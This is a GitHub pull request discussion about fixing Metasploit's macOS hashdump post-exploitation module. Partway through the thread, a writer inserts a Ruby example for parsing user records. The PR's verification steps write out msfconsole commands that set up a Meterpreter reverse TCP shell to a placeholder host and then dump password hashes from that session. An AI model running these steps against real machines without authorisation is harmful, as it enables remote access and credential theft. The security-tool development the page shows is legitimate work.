
hash_dump now working properly up to Mac OS X High Sierra (10.13.6 in… #10594

Merged
merged 1 commit into from
Sep 25, 2018

Conversation

ssh3ll
Contributor

@ssh3ll ssh3ll commented Sep 6, 2018

…cluded)

These changes fix a simple issue which was preventing the module from working properly.
The initial idea was to add support for newer Mac OS X releases. However, it looks like the script works fine with the applied changes, also for the newer releases.

Initially, the script was retrieving the usernames using the ls utility. However, this behaviour may have led to several unexpected results. As an example, any file/directory stored under the /Users directory would have been considered a regular user (which doesn't even make sense).

With the applied changes, the usernames are retrieved directly from the DirectoryService, providing a more reliable way to obtain usernames and consequently allowing the script to retrieve the correct hashes.

Verification

List the steps needed to make sure this thing works

Start 'msfconsole'

use exploit/multi/handler

set payload python/meterpreter/reverse_tcp

set lhost dummy_ip

set lport dummy_port

exploit -j

Wait for a valid Python meterpreter reverse TCP shell (assuming its spawned as 'session 1')

use post/osx/gather/hashdump

set session 1

run

GrimHacker pushed a commit to GrimHacker/metasploit-framework that referenced this pull request Sep 6, 2018
@busterb busterb self-assigned this Sep 10, 2018
@busterb
Member

busterb commented Sep 10, 2018

Instead of reimplementing it, this should just call Msf::Post::OSX::System.get_users instead. That way it's using common library code, which is better tested than a one-off in a module.

@ssh3ll
Contributor Author

ssh3ll commented Sep 11, 2018

I opened another pull request 5 days ago, as acammack-r7 suggested. Days have passed, no news about the pull, and now it's even labeled as "bug". Can you please explain what's going on?
I wanted to improve an existing (not working) post-exploitation module for Mac OS X; can somebody explain why the original script has been committed while this simple fix has not?

@timwr
Contributor

timwr commented Sep 12, 2018

We're sorry for the delay in getting this merged. It's marked a bug because you're fixing a bug in the module :)
I tested your fix and it works great, but we think it could be simpler. There is an existing function for getting the users here:
https://github.com/rapid7/metasploit-framework/blob/master/lib/msf/core/post/osx/system.rb#L69
Can you try importing it, e.g. include Msf::Post::OSX::System, and using it?
If not, we can make the change for you while landing this. Thanks again and sorry for the delay.

@tdoan-r7 tdoan-r7 added rn-fix release notes fix rn-no-release-notes no release notes and removed rn-fix release notes fix labels Sep 12, 2018
@ssh3ll
Contributor Author

ssh3ll commented Sep 12, 2018

Of course, I can try it!
However, there's another issue in the get_nonsystem_accounts function you suggested (and I assume the same problem is affecting other methods in the same class). The problem is due to a chomp call with an empty string as a parameter, which raises an error. Additionally, not even the 'split("\n\n")' returns what it should return, making the whole function unusable.

I hope I will be able to fix both (get_nonsystem_accounts and post/osx/gather/hashdump) before the weekend ends. I'm going to modify this pull request for the hashdump module.
What about core/osx/system? Do I have to open another PR, or is it enough to merge it here?

Thank you (timwr and busterb) for your suggestions. Will let you know as soon as I've some news.

@timwr
Contributor

timwr commented Sep 12, 2018

Cool @ssh3ll ! Feel free to modify lib/msf/core/post/osx/system.rb however you like in this pull request. If it works we'll merge it here. Many thanks!
With the (\n\n), potentially different payloads (e.g. python/meterpreter/reverse_tcp, osx/x64/meterpreter/reverse_tcp, osx/x64/shell_reverse_tcp) may behave differently, but don't worry about that for now.

mkienow-r7 pushed a commit to mkienow-r7/metasploit-framework that referenced this pull request Sep 13, 2018
@busterb
Member

busterb commented Sep 25, 2018

I can go ahead and make the changes I was suggesting. Just need to test them.

@busterb
Member

busterb commented Sep 25, 2018

c89d8f8 fixes bugs in the core library, making user enumeration generally more robust on High Sierra and beyond

3e61a98 updates hashdump to use these new methods

Thanks!

@busterb
Member

busterb commented Sep 25, 2018

Release Notes

This updates the hashdump module to work on newer versions of macOS, while increasing the robustness of existing user enumeration functions in the core library for macOS.

@busterb
Member

busterb commented Sep 25, 2018

split("\n\n") was not returning the expected value because the command was actually printing "\r\n\r\n" as though this were Windows. Since apparently this is behavior that has changed over time, I added a normalization pass first with tr so that it can expect the same string delimiters on all versions.
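Added example (my own Ruby, not code from this thread, from ssh3ll's branch or from metasploit-framework's library): the two points raised on this page shown end to end, namely the PR description's argument that reading usernames from the directory service beats listing /Users, and busterb's observation above that records arrive separated by "\r\n\r\n" and must be normalised before any split. DSCL_READALL_SAMPLE and LS_USERS_SAMPLE are constructed inputs: the first imitates the blank-line-separated "Key: value" records that `dscl . -readall /Users` prints, with the Windows-style line endings reported above; the second imitates a plain `ls /Users` listing. The function names, the UniqueID >= 500 cut-off and the leading-underscore rule for service accounts are my assumptions, not the library's.

```ruby
# Constructed sample (not captured from a real host): dscl-style records in
# which every line ends in "\r\n", so consecutive records are separated by
# "\r\n\r\n" and a naive split("\n\n") finds no boundary at all.
DSCL_READALL_SAMPLE = [
  'RecordName: _www',   'UniqueID: 70',  'NFSHomeDirectory: /Library/WebServer', '',
  'RecordName: root',   'UniqueID: 0',   'NFSHomeDirectory: /var/root',          '',
  'RecordName: alice',  'UniqueID: 501', 'NFSHomeDirectory: /Users/alice',       '',
  'RecordName: bob',    'UniqueID: 502', 'NFSHomeDirectory: /Users/bob',         '',
  'RecordName: nobody', 'UniqueID: -2',  'NFSHomeDirectory: /var/empty'
].join("\r\n") + "\r\n"

# Constructed sample of `ls /Users` on the same imaginary host: the shared
# folder and a stray backup directory are not accounts, but an ls-based
# enumerator cannot tell them apart from real home directories.
LS_USERS_SAMPLE = "Shared\r\nalice\r\nbob\r\nbackup-2018\r\n"

# Normalisation pass: collapse "\r\n" (and a bare "\r") to "\n" before any
# splitting, so the same delimiters work whatever the remote command emits.
def normalize_newlines(text)
  text.gsub(/\r\n?/, "\n")
end

# Parse blank-line separated "Key: value" records into an array of hashes.
def parse_dscl_records(text)
  normalize_newlines(text).strip.split(/\n{2,}/).map do |record|
    record.lines.each_with_object({}) do |line, attrs|
      key, value = line.chomp.split(': ', 2)
      attrs[key] = value if key && value
    end
  end
end

# Non-system accounts. Assumptions: real users have UniqueID >= 500, and
# service accounts are the ones whose RecordName starts with an underscore.
def nonsystem_users(text, min_uid: 500)
  parse_dscl_records(text).select do |r|
    uid = Integer(r['UniqueID'].to_s, exception: false)
    uid && uid >= min_uid && !r['RecordName'].to_s.start_with?('_')
  end.map { |r| r['RecordName'] }
end

# The approach the PR description says the original module used, for
# comparison: every entry under /Users is taken to be a user.
def users_from_ls(text)
  normalize_newlines(text).split("\n").reject(&:empty?)
end

if __FILE__ == $PROGRAM_NAME
  p DSCL_READALL_SAMPLE.split("\n\n").size   # naive split sees 1 "record"
  p parse_dscl_records(DSCL_READALL_SAMPLE).size
  p nonsystem_users(DSCL_READALL_SAMPLE)
  p users_from_ls(LS_USERS_SAMPLE)
end
```

In a post module the text would come back from the session (the module's command execution helper) rather than from a constant; the point of the example is that normalising line endings before the split is the whole difference between one unusable blob and five clean records, and that the ls listing hands back "Shared" and "backup-2018" as if they were accounts.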

@busterb
Member

busterb commented Sep 25, 2018

@timwr something I noticed while testing this with get_users was that python meterpreter doesn't appear to close the PTY after launching a subprocess. Running this module with lots of users makes it easy to get this error:

[-] method stdapi_sys_process_execute resulted in an error
Traceback (most recent call last):
  File "<string>", line 1363, in create_response
  File "", line 1033, in stdapi_sys_process_execute
  File "/usr/local/Cellar/python@2/2.7.15_1/Frameworks/Python.framework/Versions/2.7/lib/python2.7/pty.py", line 29, in openpty
    master_fd, slave_name = _open_terminal()
  File "/usr/local/Cellar/python@2/2.7.15_1/Frameworks/Python.framework/Versions/2.7/lib/python2.7/pty.py", line 70, in _open_terminal
    raise os.error, 'out of pty devices'
OSError: out of pty devices

@ssh3ll
Contributor Author

ssh3ll commented Dec 8, 2018

It's been a "long" time since I checked this. Apologies for the delay and thanks to everyone.
Glad to have made some small (so far) contribution to MSF.

@busterb
Member

busterb commented Dec 8, 2018

Oh, I should have pinged @zeroSteiner: there appears to be a PTY leak when running subprocesses with python meterpreter that this unveiled.
